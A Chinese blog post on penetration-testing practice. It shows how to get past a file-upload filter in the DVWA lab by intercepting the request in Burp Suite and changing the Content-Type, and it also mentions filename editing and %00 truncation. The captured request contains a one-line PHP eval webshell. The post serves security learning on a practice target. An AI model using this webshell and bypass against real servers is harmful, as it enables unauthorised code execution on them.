通过截取http请求绕过前端javascript验证进行文件上传

最新推荐文章于 2024-03-20 15:55:40 发布
最新推荐文章于 2024-03-20 15:55:40 发布
阅读量1k 收藏 2
点赞数
分类专栏: 网络安全 文章标签: http 前端 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LIULIUAINI66/article/details/125735245
版权

截取HTTP请求

​ 很多网站为了减少服务器端的压力,在后台方面减少验证,而只在web前端使用Javascript进行验证,殊不知这样大大增加了安全隐患。在渗透测试中经常会进行HTTP请求的截取来发现一些隐秘的漏洞。例如:绕过Javascript验证、发现隐藏标签内容等。
在本文中我使用DVWA靶场中的文件上传漏洞中级,来进行前端验证的绕过。

1、搭建靶场

1)安装phpstudy集成环境
下载地址:https://www.xp.cn/
在这里插入图片描述
2)搭建DVWA靶场
在这里插入图片描述
3)用php写个一句话木马用来获取webshll
在这里插入图片描述

2、进入靶场开始绕过

1)我们先直接上传木马看看能否成功
在这里插入图片描述
在这里插入图片描述
可以看到上传失败,下方红色提示:您的图片未上传。我们只能接受 JPEG 或 PNG 图像。
因为我上传的木马是.php格式的,它对文件格式做了过滤只允许.jpeg或.png文件上传。
2)我们用burpsuite抓包看看他的请求包是怎样的
在这里插入图片描述

100000
------WebKitFormBoundary9vBhdeU4CHZbAh1Z
Content-Disposition: form-data; name="uploaded"; filename="test.php"
Content-Type: application/octet-stream

<?php @eval($_POST[369]);?>
------WebKitFormBoundary9vBhdeU4CHZbAh1Z
Content-Disposition: form-data; name="Upload"

Upload
------WebKitFormBoundary9vBhdeU4CHZbAh1Z--

通过burp抓包分析,它通过" Content-Type"这个属性来判断是否为规定上传的文件格式。那我们修改这个格式为image/jpeg上传
在这里插入图片描述
上传成功并且返回了上传文件的路径
在这里插入图片描述

在这里插入图片描述

3、其他方法

1)上传文件名是"123.jpeg"的文件,随后在burp里面修改文件名,而不用修改" Content-Type "的内容,也可以实现文件上传。
2)在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,可以在文件名中使用%00截断。

上面这两种方法我都尝试过,都可以成功,之后的步骤就是使用蚁剑或菜刀连接了,我就不写了,主要目的是通过截取http请求绕过前端javascript验证,这种方法很实用
迷失的黑色精灵
关注
专栏目录
【网络安全绕过输入验证
最新发布
等风来
08-27 588
输入验证是检查用户输入的数据是否符合特定要求和约束的过程,这个过程通常发生在注册时填写信息时。它对于确保应用程序的安全性至关重要,因为不当的输入可能会引发严重的安全漏洞
CSRF学习以及一些绕过referer的方法
不想当脚本小子的脚本小子
01-23 2543
跨站请求伪造,原理:——两个关键点:跨站点的请求以及请求是伪造的 攻击者盗用了用户的身份,以用户的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作 1. 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A; 2.在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A; 3. 用户未退出网站A之前,在同一浏览器中,打开一个TAB页访问网站B; 4. 网站B接收到用户请求后,返回一些攻击性代
52.网络安全渗透测试—[文件上传篇2]—[客户端JS验证绕过-突破上传]
qwsn
08-07 2327
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、客户端JS验证绕过,突破上传 1、解决方法一:`修改html` 2、解决方法二:`抓包改包` 3、解决方法三:`浏览器禁用JS功能` 4、解决方法四: `抓包,BurpSuite禁用JS功能`
文件上传前端JS验证绕过与思考
redwand的博客
04-14 3449
文件上传中的前端JS验证,应该说是文件上传验证里面最简单的、也是最容易绕过验证,对于网络安全知识的积累,个人觉得最简单、基础的东西,往往要掌握的更加扎实,这样才能牢固的筑起万丈高楼,本文通过常规的集中绕过方式,对前端验证进行了一些总结和思考。
绕过Javascript检查
dlz00001的博客
06-10 224
如今,Web应用程序提供注册页面时,通常会复制密码字段(有时甚至是电子邮件字段)。 通过两次输入密码,它可以确保您没有输入任何错误。 并且您下次尝试登录时不必重置密码。 如果您实际输入密码,这是有道理的。 我,我正在使用密码管理器。 这意味着,我将两次从密码管理器获取的密码进行复制粘贴。 到目前为止,一切都很好。 现在,一些Web应用程序假定人们确实输入了密码。 更糟糕的是,这些应用程...
JS截取url请求参数
Web前端工程师
07-27 372
function GetQueryString(name) { var searchStr = decodeURI(window.location.search.substr(1)); var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)"); var r = searchStr.match(reg); if (r != null) return unescape(r[2]); if (nullDefa.
如何跳过前端JavaScript验证
weixin_38168322的博客
08-30 2480
经常听别人说不要把验证的功能放在前端,因为别人可以通过其他的方法跳过前端的校验,从而达到绕过前端验证。 那么是如何绕过前端验证的?有很多的方法,我这里说一种方法。 1、就是先把网站下载下来保存到本地。 2、下载完之后改js里面的action地址,一般都是相对地址来的,直接改为网站的绝对地址就好了。 3、改完之后,把一些前端验证方法删除掉,然后试着提交数据,就可以绕过前端校验了...
上传后缀绕过
12-13
通过抓包工具如Burp Suite截取上传请求,将文件名中的`.jpg`修改为`.php`(例如:将`evil.jpg`改为`evil.php`),这样可以绕过前端的文件扩展名检查。由于前端验证通常较为简单,这种方法往往有效。 ##### 0x02: ...
JavaScript 前端面试题!!!
木木木森林
10-29 787
JavaScript 前端面试精华1. 介绍 js 的基本数据类型。2. JavaScript 有几种类型的值?你能画一下他们的内存图吗?3. 什么是堆?什么是栈?它们之间有什么区别和联系?4. 内部属性 [[Class]] 是什么5. 介绍 js 有哪些内置对象?6. undefined 与 undeclared 的区别?7. null 和 undefined 的区别?8. 如何获取安全的 undefined 值?9. 说几条写 JavaScript 的基本规范?10. JavaScript 原型,原型链
文件上传漏洞
Zeker62的博客
09-07 455
目录文件上传漏洞简介上传漏洞类型前端JS绕过构建环境$_FILES()函数说明漏洞分析禁用浏览器的JS执行使用抓包软件修改拓展名传参修改前端JS代码绕过文件名过滤绕过环境搭建漏洞分析代码审计使用大小写绕过过滤Content-Type过滤绕过环境搭建漏洞分析代码审计更改Content-Type的值以绕过过滤判断文件头过滤绕过常见的图片文件头环境搭建漏洞分析.htaccess上传漏洞环境搭建漏洞分析...
简单的文件上传漏洞以及前端后端的简单绕过思路
太阳照耀我走四方
02-14 1128
简单的文件上传漏洞以及前端后端的简单绕过思路
如何截取Http请求
问君能有几多愁,恰似一江春水向东流
04-11 1220
1:前言     本篇文章比较短,主要是因为我的一个随想产生的一段代码。 这段代码的功能你可以叫做是简单的Http服务器也可以叫做Http请求截取。它实现的功能就是截取Http请求然后自己做处理。 2:代码 public class HttpServer : IDisposable { private HttpListener listener;
HTTP协议层面绕过WAF
m0_61506558的博客
11-13 1037
WAF分为非嵌入型WAF和嵌入型WAF,非嵌入型指的是硬WAF、云WAF、虚拟机WAF之类的;嵌入型指的是web容器模块类型WAF、代码层WAF。
Burp suite 分析 HTTP协议
qq_43938052的博客
11-24 2078
Burp suite 分析 HTTP协议 1.实验环境 1.manjaro-gnome-20.1.2 2.Burp suite-Community-v2020.11.1(下载地址) 2.Burp suite安装与配置 打开Firefox,安装下图插件。 配置代理,端口号可自行选择(选择空闲的就可)。 配置Burp suite,端口要与前面的配置一致。 访问http://burp/下载burpsuite ca证书 需开启刚刚配置的代理 点击右上角CA Certificate 点击首选项>&g
burpsuit学习---前端绕过
wr456wr的博客
12-03 821
文章目录使用burpsuit进行前端绕过环境实验部分 使用burpsuit进行前端绕过 环境 Kali2021上自带的burpsuit软件。 浏览器为火狐浏览器 进行实验的前端地址:https://rimovni.exeye.run/mecimlif/home 实验部分 在浏览器内访问该网站 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 点击信息修改 在浏览器内打开代理 此时打开burpsuit,点击proxy,开启拦截 此时在浏览器上填写信息并提交 此时在burpsuit上
结合Burp Suite绕过前端验证机制原理总结
12november的博客
07-03 1461
该实验在Burp Suite配置完成的前提下进行
js截取网址参数值方法
sun_qqq的博客
03-20 671
token 值出现在 URL 的 hash 部分,所以你需要使用 window.location.hash 来获取 hash 部分,然后使用 URLSearchParams 对象来解析 token 值。console.log(token) //打印 ceshiToken。console.log(token) //打印 ceshi。token 值出现在 URL 的查询参数部分。//hash截取网址参数方法。//获取token值。//截取网址参数方法。//获取token值。
WEB安全新玩法 [2] 防范前端验证绕过
天存信息
09-18 2618
防范前端验证绕过一、前端验证的原始网站1.1 正常用户访问1.2 攻击者访问二、iFlow虚拟补丁后的网站2.1 正常用户访问2.2 攻击者访问2.3 代码三、总结 用户登录,几乎是所有 Web 应用所必须的环节。Web 应用通常会加入一些验证手段,以防止攻击者使用机器人自动登录,如要求用户输入图形验证码、拖动滑动条等。但是,如果验证的逻辑仅仅在前端执行,是很容易被攻击者绕过的。iFlow 业务安全加固平台 可以为只使用前端验证的应用打上动态虚拟补丁,使之成为需要前后端配合执行的验证逻辑,大幅度提高攻击者的
文件上传-绕过JS前端验证
T1ngSh0w的博客
09-18 2324
文件上传漏洞染过JS前端验证
绕过文件上传黑名单验证策略与实战
在第三节的“文件上传-绕过黑名单验证-01”内容中,我们深入探讨了如何在Web开发中处理文件上传安全问题,特别是针对文件后缀名验证的策略。文件上传模块是Web应用程序常见的功能,但也常常成为攻击者利用的入口点,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

迷失的黑色精灵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值